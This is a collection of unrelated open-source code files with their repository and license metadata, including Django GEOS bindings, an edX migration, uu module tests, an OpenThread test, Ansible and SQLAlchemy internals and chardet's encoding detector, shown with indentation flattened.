ptr = cast(val_array, POINTER(Value))
# set the values of the array through the pointer:
for i in range(4):
ptr[i].val = i + 1
values = [ptr[i].val for i in range(4)]
        # These are the expected results: here's the bug!
self.assertEqual(
(values, dump(val_array)),
([1, 2, 3, 4], "01-02-03-04")
)
if __name__ == "__main__":
unittest.main()
|
bsd-2-clause
|
riteshshrv/django
|
django/contrib/gis/geos/prototypes/geom.py
|
288
|
4069
|
from ctypes import POINTER, c_char_p, c_int, c_size_t, c_ubyte
from django.contrib.gis.geos.libgeos import CS_PTR, GEOM_PTR, GEOSFuncFactory
from django.contrib.gis.geos.prototypes.errcheck import (
check_geom, check_minus_one, check_sized_string, check_string, check_zero,
)
# This is the return type used by binary output (WKB, HEX) routines.
c_uchar_p = POINTER(c_ubyte)
# We create a simple subclass of c_char_p here because when the response
# type is set to c_char_p, you get a _Python_ string and there's no way
# to access the string's address inside the error checking function.
# In other words, you can't free the memory allocated inside GEOS. Previously,
# the return type would just be omitted and the integer address would be
# used -- but this allows us to be specific in the function definition and
# keeps the reference so it may be free'd.
class geos_char_p(c_char_p):
pass
# ### ctypes factory classes ###
class BinConstructor(GEOSFuncFactory):
"Generates a prototype for binary construction (HEX, WKB) GEOS routines."
argtypes = [c_char_p, c_size_t]
restype = GEOM_PTR
errcheck = staticmethod(check_geom)
# HEX & WKB output
class BinOutput(GEOSFuncFactory):
"Generates a prototype for the routines that return a sized string."
argtypes = [GEOM_PTR, POINTER(c_size_t)]
restype = c_uchar_p
errcheck = staticmethod(check_sized_string)
class GeomOutput(GEOSFuncFactory):
"For GEOS routines that return a geometry."
restype = GEOM_PTR
errcheck = staticmethod(check_geom)
def get_func(self, argtypes):
self.argtypes = argtypes
return super(GeomOutput, self).get_func()
class IntFromGeom(GEOSFuncFactory):
"Argument is a geometry, return type is an integer."
argtypes = [GEOM_PTR]
restype = c_int
def get_func(self, zero=False):
if zero:
self.errcheck = check_zero
else:
self.errcheck = check_minus_one
return super(IntFromGeom, self).get_func()
class StringFromGeom(GEOSFuncFactory):
"Argument is a Geometry, return type is a string."
argtypes = [GEOM_PTR]
restype = geos_char_p
errcheck = staticmethod(check_string)
# ### ctypes prototypes ###
# Deprecated creation routines from WKB, HEX, WKT
from_hex = BinConstructor('GEOSGeomFromHEX_buf')
from_wkb = BinConstructor('GEOSGeomFromWKB_buf')
from_wkt = GeomOutput('GEOSGeomFromWKT', [c_char_p])
# Deprecated output routines
to_hex = BinOutput('GEOSGeomToHEX_buf')
to_wkb = BinOutput('GEOSGeomToWKB_buf')
to_wkt = StringFromGeom('GEOSGeomToWKT')
# The GEOS geometry type, typeid, num_coordinates and number of geometries
geos_normalize = IntFromGeom('GEOSNormalize')
geos_type = StringFromGeom('GEOSGeomType')
geos_typeid = IntFromGeom('GEOSGeomTypeId')
get_dims = IntFromGeom('GEOSGeom_getDimensions', zero=True)
get_num_coords = IntFromGeom('GEOSGetNumCoordinates')
get_num_geoms = IntFromGeom('GEOSGetNumGeometries')
# Geometry creation factories
create_point = GeomOutput('GEOSGeom_createPoint', [CS_PTR])
create_linestring = GeomOutput('GEOSGeom_createLineString', [CS_PTR])
create_linearring = GeomOutput('GEOSGeom_createLinearRing', [CS_PTR])
# Polygon and collection creation routines are special and will not
# have their argument types defined.
create_polygon = GeomOutput('GEOSGeom_createPolygon', None)
create_collection = GeomOutput('GEOSGeom_createCollection', None)
# Ring routines
get_extring = GeomOutput('GEOSGetExteriorRing', [GEOM_PTR])
get_intring = GeomOutput('GEOSGetInteriorRingN', [GEOM_PTR, c_int])
get_nrings = IntFromGeom('GEOSGetNumInteriorRings')
# Collection Routines
get_geomn = GeomOutput('GEOSGetGeometryN', [GEOM_PTR, c_int])
# Cloning
geom_clone = GEOSFuncFactory('GEOSGeom_clone', argtypes=[GEOM_PTR], restype=GEOM_PTR)
# Destruction routine.
destroy_geom = GEOSFuncFactory('GEOSGeom_destroy', argtypes=[GEOM_PTR])
# SRID routines
geos_get_srid = GEOSFuncFactory('GEOSGetSRID', argtypes=[GEOM_PTR], restype=c_int)
geos_set_srid = GEOSFuncFactory('GEOSSetSRID', argtypes=[GEOM_PTR, c_int])
|
bsd-3-clause
|
sbalde/edxplatform
|
openedx/core/djangoapps/content/course_overviews/migrations/0006_add_version_and_timestamp.py
|
56
|
4600
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'CourseOverview.created'
db.add_column('course_overviews_courseoverview', 'created',
self.gf('model_utils.fields.AutoCreatedField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CourseOverview.modified'
db.add_column('course_overviews_courseoverview', 'modified',
self.gf('model_utils.fields.AutoLastModifiedField')(default=datetime.datetime.now),
keep_default=False)
# Adding field 'CourseOverview.version'
db.add_column('course_overviews_courseoverview', 'version',
self.gf('django.db.models.fields.IntegerField')(default=0),
keep_default=False)
def backwards(self, orm):
# Deleting field 'CourseOverview.created'
db.delete_column('course_overviews_courseoverview', 'created')
# Deleting field 'CourseOverview.modified'
db.delete_column('course_overviews_courseoverview', 'modified')
# Deleting field 'CourseOverview.version'
db.delete_column('course_overviews_courseoverview', 'version')
models = {
'course_overviews.courseoverview': {
'Meta': {'object_name': 'CourseOverview'},
'_location': ('xmodule_django.models.UsageKeyField', [], {'max_length': '255'}),
'_pre_requisite_courses_json': ('django.db.models.fields.TextField', [], {}),
'advertised_start': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'cert_html_view_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'cert_name_long': ('django.db.models.fields.TextField', [], {}),
'cert_name_short': ('django.db.models.fields.TextField', [], {}),
'certificates_display_behavior': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'certificates_show_before_end': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'course_image_url': ('django.db.models.fields.TextField', [], {}),
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'days_early_for_beta': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'display_name': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'display_number_with_default': ('django.db.models.fields.TextField', [], {}),
'display_org_with_default': ('django.db.models.fields.TextField', [], {}),
'end': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'end_of_course_survey_url': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'enrollment_domain': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'enrollment_end': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'enrollment_start': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'facebook_url': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'has_any_active_web_certificate': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'primary_key': 'True', 'db_index': 'True'}),
'invitation_only': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'lowest_passing_grade': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '5', 'decimal_places': '2'}),
'max_student_enrollments_allowed': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'mobile_available': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
'social_sharing_url': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'start': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'version': ('django.db.models.fields.IntegerField', [], {}),
'visible_to_staff_only': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
}
}
complete_apps = ['course_overviews']
|
agpl-3.0
|
dd00/commandergenius
|
project/jni/python/src/Lib/test/test_uu.py
|
61
|
5316
|
"""
Tests for uu module.
Nick Mathewson
"""
import unittest
from test import test_support
import sys, os, uu, cStringIO
plaintext = "The smooth-scaled python crept over the sleeping dog\n"
encodedtext = """\
M5&AE('-M;V]T:\"US8V%L960@<'ET:&]N(&-R97!T(&]V97(@=&AE('-L965P
(:6YG(&1O9PH """
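# Template wrapping the encoded payload in uu "begin <mode> <name>" / "end"
# lines; literal '%' characters in the payload are doubled so the mode and
# name can be substituted with the % operator below.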
encodedtextwrapped = "begin %03o %s\n" + encodedtext.replace("%", "%%") + "\n \nend\n"
class UUTest(unittest.TestCase):
def test_encode(self):
inp = cStringIO.StringIO(plaintext)
out = cStringIO.StringIO()
uu.encode(inp, out, "t1")
self.assertEqual(out.getvalue(), encodedtextwrapped % (0666, "t1"))
inp = cStringIO.StringIO(plaintext)
out = cStringIO.StringIO()
uu.encode(inp, out, "t1", 0644)
self.assertEqual(out.getvalue(), encodedtextwrapped % (0644, "t1"))
def test_decode(self):
inp = cStringIO.StringIO(encodedtextwrapped % (0666, "t1"))
out = cStringIO.StringIO()
uu.decode(inp, out)
self.assertEqual(out.getvalue(), plaintext)
inp = cStringIO.StringIO(
"UUencoded files may contain many lines,\n" +
"even some that have 'begin' in them.\n" +
encodedtextwrapped % (0666, "t1")
)
out = cStringIO.StringIO()
uu.decode(inp, out)
self.assertEqual(out.getvalue(), plaintext)
def test_truncatedinput(self):
inp = cStringIO.StringIO("begin 644 t1\n" + encodedtext)
out = cStringIO.StringIO()
try:
uu.decode(inp, out)
self.fail("No exception thrown")
except uu.Error, e:
self.assertEqual(str(e), "Truncated input file")
def test_missingbegin(self):
inp = cStringIO.StringIO("")
out = cStringIO.StringIO()
try:
uu.decode(inp, out)
self.fail("No exception thrown")
except uu.Error, e:
self.assertEqual(str(e), "No valid begin line found in input file")
class UUStdIOTest(unittest.TestCase):
def setUp(self):
self.stdin = sys.stdin
self.stdout = sys.stdout
def tearDown(self):
sys.stdin = self.stdin
sys.stdout = self.stdout
def test_encode(self):
sys.stdin = cStringIO.StringIO(plaintext)
sys.stdout = cStringIO.StringIO()
uu.encode("-", "-", "t1", 0666)
self.assertEqual(
sys.stdout.getvalue(),
encodedtextwrapped % (0666, "t1")
)
def test_decode(self):
sys.stdin = cStringIO.StringIO(encodedtextwrapped % (0666, "t1"))
sys.stdout = cStringIO.StringIO()
uu.decode("-", "-")
self.assertEqual(sys.stdout.getvalue(), plaintext)
class UUFileTest(unittest.TestCase):
def _kill(self, f):
# close and remove file
try:
f.close()
except (SystemExit, KeyboardInterrupt):
raise
except:
pass
try:
os.unlink(f.name)
except (SystemExit, KeyboardInterrupt):
raise
except:
pass
def setUp(self):
self.tmpin = test_support.TESTFN + "i"
self.tmpout = test_support.TESTFN + "o"
def tearDown(self):
del self.tmpin
del self.tmpout
def test_encode(self):
fin = fout = None
try:
test_support.unlink(self.tmpin)
fin = open(self.tmpin, 'wb')
fin.write(plaintext)
fin.close()
fin = open(self.tmpin, 'rb')
fout = open(self.tmpout, 'w')
uu.encode(fin, fout, self.tmpin, mode=0644)
fin.close()
fout.close()
fout = open(self.tmpout, 'r')
s = fout.read()
fout.close()
self.assertEqual(s, encodedtextwrapped % (0644, self.tmpin))
# in_file and out_file as filenames
uu.encode(self.tmpin, self.tmpout, self.tmpin, mode=0644)
fout = open(self.tmpout, 'r')
s = fout.read()
fout.close()
self.assertEqual(s, encodedtextwrapped % (0644, self.tmpin))
finally:
self._kill(fin)
self._kill(fout)
def test_decode(self):
f = None
try:
test_support.unlink(self.tmpin)
f = open(self.tmpin, 'w')
f.write(encodedtextwrapped % (0644, self.tmpout))
f.close()
f = open(self.tmpin, 'r')
uu.decode(f)
f.close()
f = open(self.tmpout, 'r')
s = f.read()
f.close()
self.assertEqual(s, plaintext)
# XXX is there an xp way to verify the mode?
finally:
self._kill(f)
def test_decodetwice(self):
# Verify that decode() will refuse to overwrite an existing file
f = None
try:
f = cStringIO.StringIO(encodedtextwrapped % (0644, self.tmpout))
f = open(self.tmpin, 'r')
uu.decode(f)
f.close()
f = open(self.tmpin, 'r')
self.assertRaises(uu.Error, uu.decode, f)
f.close()
finally:
self._kill(f)
def test_main():
test_support.run_unittest(UUTest, UUStdIOTest, UUFileTest)
if __name__=="__main__":
test_main()
|
lgpl-2.1
|
abtink/openthread
|
tests/toranj/test-034-poor-link-parent-child-attach.py
|
9
|
3302
|
#!/usr/bin/env python3
#
# Copyright (c) 2019, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import wpan
# -----------------------------------------------------------------------------------------------------------------------
# Test description:
#
# This test covers a situation where the network contains a single parent with a poor-quality link, ensuring
# that the child can still attach to that parent.
test_name = __file__[:-3] if __file__.endswith('.py') else __file__
print('-' * 120)
print('Starting \'{}\''.format(test_name))
# -----------------------------------------------------------------------------------------------------------------------
# Creating `wpan.Nodes` instances
speedup = 4
wpan.Node.set_time_speedup_factor(speedup)
parent = wpan.Node()
child = wpan.Node()
# -----------------------------------------------------------------------------------------------------------------------
# Init all nodes
wpan.Node.init_all_nodes()
# -----------------------------------------------------------------------------------------------------------------------
# Test implementation
parent.form("network")
# Create a poor link between child and parent using MAC fixed RSSI filter
parent.set(wpan.WPAN_MAC_FILTER_FIXED_RSSI, '-99')
parent.add(wpan.WPAN_MAC_FILTER_ENTRIES, child.get(wpan.WPAN_EXT_ADDRESS)[1:-1])
child.set(wpan.WPAN_MAC_FILTER_FIXED_RSSI, '-99')
child.add(wpan.WPAN_MAC_FILTER_ENTRIES, parent.get(wpan.WPAN_EXT_ADDRESS)[1:-1])
# Ensure the child can still attach to the single low link-quality parent
child.join_node(parent, node_type=wpan.JOIN_TYPE_END_DEVICE)
# -----------------------------------------------------------------------------------------------------------------------
# Test finished
wpan.Node.finalize_all_nodes()
print('\'{}\' passed.'.format(test_name))
|
bsd-3-clause
|
jotes/ansible
|
lib/ansible/runner/return_data.py
|
133
|
2102
|
# (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from ansible import utils
class ReturnData(object):
''' internal return class for runner execute methods, not part of public API signature '''
__slots__ = [ 'result', 'comm_ok', 'host', 'diff' ]
def __init__(self, conn=None, host=None, result=None,
comm_ok=True, diff=dict()):
# which host is this ReturnData about?
if conn is not None:
self.host = conn.host
delegate = getattr(conn, 'delegate', None)
if delegate is not None:
self.host = delegate
else:
self.host = host
self.result = result
self.comm_ok = comm_ok
# if these values are set and used with --diff we can show
# changes made to particular files
self.diff = diff
if type(self.result) in [ str, unicode ]:
self.result = utils.parse_json(self.result, from_remote=True, no_exceptions=True)
if self.host is None:
raise Exception("host not set")
if type(self.result) != dict:
raise Exception("dictionary result expected")
def communicated_ok(self):
return self.comm_ok
def is_successful(self):
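        # Success means: communication with the host worked, the module did not
        # report 'failed', and either 'failed_when_result' is falsy (when that
        # key is present) or, otherwise, the return code ('rc') is 0.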
return self.comm_ok and (self.result.get('failed', False) == False) and ('failed_when_result' in self.result and [not self.result['failed_when_result']] or [self.result.get('rc',0) == 0])[0]
|
gpl-3.0
|
brototyp/CouchPotato
|
library/sqlalchemy/dialects/mssql/mxodbc.py
|
18
|
3274
|
"""
Support for MS-SQL via mxODBC.
mxODBC is available at:
http://www.egenix.com/
This was tested with mxODBC 3.1.2 and the SQL Server Native
Client connected to MSSQL 2005 and 2008 Express Editions.
Connecting
~~~~~~~~~~
Connection is via DSN::
mssql+mxodbc://<username>:<password>@<dsnname>
Execution Modes
~~~~~~~~~~~~~~~
mxODBC features two styles of statement execution, using the
``cursor.execute()`` and ``cursor.executedirect()`` methods (the second being
an extension to the DBAPI specification). The former makes use of a particular
API call specific to the SQL Server Native Client ODBC driver known
SQLDescribeParam, while the latter does not.
mxODBC apparently only makes repeated use of a single prepared statement
when SQLDescribeParam is used. The advantage to prepared statement reuse is
one of performance. The disadvantage is that SQLDescribeParam has a limited
set of scenarios in which bind parameters are understood, including that they
cannot be placed within the argument lists of function calls, anywhere outside
the FROM, or even within subqueries within the FROM clause - making the usage
of bind parameters within SELECT statements impossible for all but the most
simplistic statements.
For this reason, the mxODBC dialect uses the "native" mode by default only for
INSERT, UPDATE, and DELETE statements, and uses the escaped string mode for
all other statements.
This behavior can be controlled via
:meth:`~sqlalchemy.sql.expression.Executable.execution_options` using the
``native_odbc_execute`` flag with a value of ``True`` or ``False``, where a
value of ``True`` will unconditionally use native bind parameters and a value
of ``False`` will unconditionally use string-escaped parameters.
"""
import re
import sys
from sqlalchemy import types as sqltypes
from sqlalchemy import util
from sqlalchemy.connectors.mxodbc import MxODBCConnector
from sqlalchemy.dialects.mssql.pyodbc import MSExecutionContext_pyodbc
from sqlalchemy.dialects.mssql.base import (MSExecutionContext, MSDialect,
MSSQLCompiler,
MSSQLStrictCompiler,
_MSDateTime, _MSDate, TIME)
class MSExecutionContext_mxodbc(MSExecutionContext_pyodbc):
"""
The pyodbc execution context is useful for enabling
SELECT SCOPE_IDENTITY in cases where OUTPUT clause
does not work (tables with insert triggers).
"""
#todo - investigate whether the pyodbc execution context
# is really only being used in cases where OUTPUT
# won't work.
class MSDialect_mxodbc(MxODBCConnector, MSDialect):
# TODO: may want to use this only if FreeTDS is not in use,
# since FreeTDS doesn't seem to use native binds.
statement_compiler = MSSQLStrictCompiler
execution_ctx_cls = MSExecutionContext_mxodbc
colspecs = {
#sqltypes.Numeric : _MSNumeric,
sqltypes.DateTime : _MSDateTime,
sqltypes.Date : _MSDate,
sqltypes.Time : TIME,
}
def __init__(self, description_encoding='latin-1', **params):
super(MSDialect_mxodbc, self).__init__(**params)
self.description_encoding = description_encoding
dialect = MSDialect_mxodbc
|
gpl-3.0
|
jsirois/pex
|
pex/vendor/_vendored/pip/pip/_vendor/chardet/universaldetector.py
|
244
|
12485
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
"""
Module containing the UniversalDetector detector class, which is the primary
class a user of ``chardet`` should use.
:author: Mark Pilgrim (initial port to Python)
:author: Shy Shalom (original C code)
:author: Dan Blanchard (major refactoring for 3.0)
:author: Ian Cordasco
"""
import codecs
import logging
import re
from .charsetgroupprober import CharSetGroupProber
from .enums import InputState, LanguageFilter, ProbingState
from .escprober import EscCharSetProber
from .latin1prober import Latin1Prober
from .mbcsgroupprober import MBCSGroupProber
from .sbcsgroupprober import SBCSGroupProber
class UniversalDetector(object):
"""
The ``UniversalDetector`` class underlies the ``chardet.detect`` function
and coordinates all of the different charset probers.
To get a ``dict`` containing an encoding and its confidence, you can simply
run:
.. code::
u = UniversalDetector()
u.feed(some_bytes)
u.close()
detected = u.result
"""
MINIMUM_THRESHOLD = 0.20
HIGH_BYTE_DETECTOR = re.compile(b'[\x80-\xFF]')
ESC_DETECTOR = re.compile(b'(\033|~{)')
WIN_BYTE_DETECTOR = re.compile(b'[\x80-\x9F]')
ISO_WIN_MAP = {'iso-8859-1': 'Windows-1252',
'iso-8859-2': 'Windows-1250',
'iso-8859-5': 'Windows-1251',
'iso-8859-6': 'Windows-1256',
'iso-8859-7': 'Windows-1253',
'iso-8859-8': 'Windows-1255',
'iso-8859-9': 'Windows-1254',
'iso-8859-13': 'Windows-1257'}
def __init__(self, lang_filter=LanguageFilter.ALL):
self._esc_charset_prober = None
self._charset_probers = []
self.result = None
self.done = None
self._got_data = None
self._input_state = None
self._last_char = None
self.lang_filter = lang_filter
self.logger = logging.getLogger(__name__)
self._has_win_bytes = None
self.reset()
def reset(self):
"""
Reset the UniversalDetector and all of its probers back to their
initial states. This is called by ``__init__``, so you only need to
call this directly in between analyses of different documents.
"""
self.result = {'encoding': None, 'confidence': 0.0, 'language': None}
self.done = False
self._got_data = False
self._has_win_bytes = False
self._input_state = InputState.PURE_ASCII
self._last_char = b''
if self._esc_charset_prober:
self._esc_charset_prober.reset()
for prober in self._charset_probers:
prober.reset()
def feed(self, byte_str):
"""
Takes a chunk of a document and feeds it through all of the relevant
charset probers.
After calling ``feed``, you can check the value of the ``done``
attribute to see if you need to continue feeding the
``UniversalDetector`` more data, or if it has made a prediction
(in the ``result`` attribute).
.. note::
You should always call ``close`` when you're done feeding in your
document if ``done`` is not already ``True``.
"""
if self.done:
return
if not len(byte_str):
return
if not isinstance(byte_str, bytearray):
byte_str = bytearray(byte_str)
# First check for known BOMs, since these are guaranteed to be correct
if not self._got_data:
# If the data starts with BOM, we know it is UTF
if byte_str.startswith(codecs.BOM_UTF8):
# EF BB BF UTF-8 with BOM
self.result = {'encoding': "UTF-8-SIG",
'confidence': 1.0,
'language': ''}
elif byte_str.startswith((codecs.BOM_UTF32_LE,
codecs.BOM_UTF32_BE)):
# FF FE 00 00 UTF-32, little-endian BOM
# 00 00 FE FF UTF-32, big-endian BOM
self.result = {'encoding': "UTF-32",
'confidence': 1.0,
'language': ''}
elif byte_str.startswith(b'\xFE\xFF\x00\x00'):
# FE FF 00 00 UCS-4, unusual octet order BOM (3412)
self.result = {'encoding': "X-ISO-10646-UCS-4-3412",
'confidence': 1.0,
'language': ''}
elif byte_str.startswith(b'\x00\x00\xFF\xFE'):
# 00 00 FF FE UCS-4, unusual octet order BOM (2143)
self.result = {'encoding': "X-ISO-10646-UCS-4-2143",
'confidence': 1.0,
'language': ''}
elif byte_str.startswith((codecs.BOM_LE, codecs.BOM_BE)):
# FF FE UTF-16, little endian BOM
# FE FF UTF-16, big endian BOM
self.result = {'encoding': "UTF-16",
'confidence': 1.0,
'language': ''}
self._got_data = True
if self.result['encoding'] is not None:
self.done = True
return
        # If none of those matched and we've only seen ASCII so far, check
# for high bytes and escape sequences
if self._input_state == InputState.PURE_ASCII:
if self.HIGH_BYTE_DETECTOR.search(byte_str):
self._input_state = InputState.HIGH_BYTE
elif self._input_state == InputState.PURE_ASCII and \
self.ESC_DETECTOR.search(self._last_char + byte_str):
self._input_state = InputState.ESC_ASCII
self._last_char = byte_str[-1:]
# If we've seen escape sequences, use the EscCharSetProber, which
# uses a simple state machine to check for known escape sequences in
# HZ and ISO-2022 encodings, since those are the only encodings that
# use such sequences.
if self._input_state == InputState.ESC_ASCII:
if not self._esc_charset_prober:
self._esc_charset_prober = EscCharSetProber(self.lang_filter)
if self._esc_charset_prober.feed(byte_str) == ProbingState.FOUND_IT:
self.result = {'encoding':
self._esc_charset_prober.charset_name,
'confidence':
self._esc_charset_prober.get_confidence(),
'language':
self._esc_charset_prober.language}
self.done = True
# If we've seen high bytes (i.e., those with values greater than 127),
# we need to do more complicated checks using all our multi-byte and
# single-byte probers that are left. The single-byte probers
# use character bigram distributions to determine the encoding, whereas
# the multi-byte probers use a combination of character unigram and
# bigram distributions.
elif self._input_state == InputState.HIGH_BYTE:
if not self._charset_probers:
self._charset_probers = [MBCSGroupProber(self.lang_filter)]
# If we're checking non-CJK encodings, use single-byte prober
if self.lang_filter & LanguageFilter.NON_CJK:
self._charset_probers.append(SBCSGroupProber())
self._charset_probers.append(Latin1Prober())
for prober in self._charset_probers:
if prober.feed(byte_str) == ProbingState.FOUND_IT:
self.result = {'encoding': prober.charset_name,
'confidence': prober.get_confidence(),
'language': prober.language}
self.done = True
break
if self.WIN_BYTE_DETECTOR.search(byte_str):
self._has_win_bytes = True
def close(self):
"""
Stop analyzing the current document and come up with a final
prediction.
:returns: The ``result`` attribute, a ``dict`` with the keys
`encoding`, `confidence`, and `language`.
"""
# Don't bother with checks if we're already done
if self.done:
return self.result
self.done = True
if not self._got_data:
self.logger.debug('no data received!')
# Default to ASCII if it is all we've seen so far
elif self._input_state == InputState.PURE_ASCII:
self.result = {'encoding': 'ascii',
'confidence': 1.0,
'language': ''}
# If we have seen non-ASCII, return the best that met MINIMUM_THRESHOLD
elif self._input_state == InputState.HIGH_BYTE:
prober_confidence = None
max_prober_confidence = 0.0
max_prober = None
for prober in self._charset_probers:
if not prober:
continue
prober_confidence = prober.get_confidence()
if prober_confidence > max_prober_confidence:
max_prober_confidence = prober_confidence
max_prober = prober
if max_prober and (max_prober_confidence > self.MINIMUM_THRESHOLD):
charset_name = max_prober.charset_name
lower_charset_name = max_prober.charset_name.lower()
confidence = max_prober.get_confidence()
# Use Windows encoding name instead of ISO-8859 if we saw any
# extra Windows-specific bytes
if lower_charset_name.startswith('iso-8859'):
if self._has_win_bytes:
charset_name = self.ISO_WIN_MAP.get(lower_charset_name,
charset_name)
self.result = {'encoding': charset_name,
'confidence': confidence,
'language': max_prober.language}
# Log all prober confidences if none met MINIMUM_THRESHOLD
if self.logger.getEffectiveLevel() == logging.DEBUG:
if self.result['encoding'] is None:
self.logger.debug('no probers hit minimum threshold')
for group_prober in self._charset_probers:
if not group_prober:
continue
if isinstance(group_prober, CharSetGroupProber):
for prober in group_prober.probers:
self.logger.debug('%s %s confidence = %s',
prober.charset_name,
prober.language,
prober.get_confidence())
else:
self.logger.debug('%s %s confidence = %s',
                                          group_prober.charset_name,
                                          group_prober.language,
                                          group_prober.get_confidence())
return self.result
|
apache-2.0
|
erkanay/django
|
tests/null_fk_ordering/tests.py
|
44
|
2014
|
from __future__ import unicode_literals
from django.test import TestCase
from .models import Author, Article, SystemInfo, Forum, Post, Comment
class NullFkOrderingTests(TestCase):
def test_ordering_across_null_fk(self):
"""
Regression test for #7512
ordering across nullable Foreign Keys shouldn't exclude results
"""
author_1 = Author.objects.create(name='Tom Jones')
author_2 = Author.objects.create(name='Bob Smith')
Article.objects.create(title='No author on this article')
Article.objects.create(author=author_1, title='This article written by Tom Jones')
Article.objects.create(author=author_2, title='This article written by Bob Smith')
# We can't compare results directly (since different databases sort NULLs to
# different ends of the ordering), but we can check that all results are
# returned.
self.assertTrue(len(list(Article.objects.all())) == 3)
s = SystemInfo.objects.create(system_name='System Info')
f = Forum.objects.create(system_info=s, forum_name='First forum')
p = Post.objects.create(forum=f, title='First Post')
Comment.objects.create(post=p, comment_text='My first comment')
Comment.objects.create(comment_text='My second comment')
s2 = SystemInfo.objects.create(system_name='More System Info')
f2 = Forum.objects.create(system_info=s2, forum_name='Second forum')
p2 = Post.objects.create(forum=f2, title='Second Post')
Comment.objects.create(comment_text='Another first comment')
Comment.objects.create(post=p2, comment_text='Another second comment')
# We have to test this carefully. Some databases sort NULL values before
# everything else, some sort them afterwards. So we extract the ordered list
# and check the length. Before the fix, this list was too short (some values
# were omitted).
self.assertTrue(len(list(Comment.objects.all())) == 4)
|
bsd-3-clause
|
radhika-raghavendran/mbed-os5.1-onsemi
|
tools/host_tests/wait_us_auto.py
|
122
|
2871
|
"""
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from time import time
class WaitusTest():
""" This test is reading single characters from stdio
and measures time between their occurrences.
"""
TICK_LOOP_COUNTER = 13
TICK_LOOP_SUCCESSFUL_COUNTS = 10
DEVIATION = 0.10 # +/-10%
def test(self, selftest):
test_result = True
# First character to start test (to know after reset when test starts)
if selftest.mbed.set_serial_timeout(None) is None:
return selftest.RESULT_IO_SERIAL
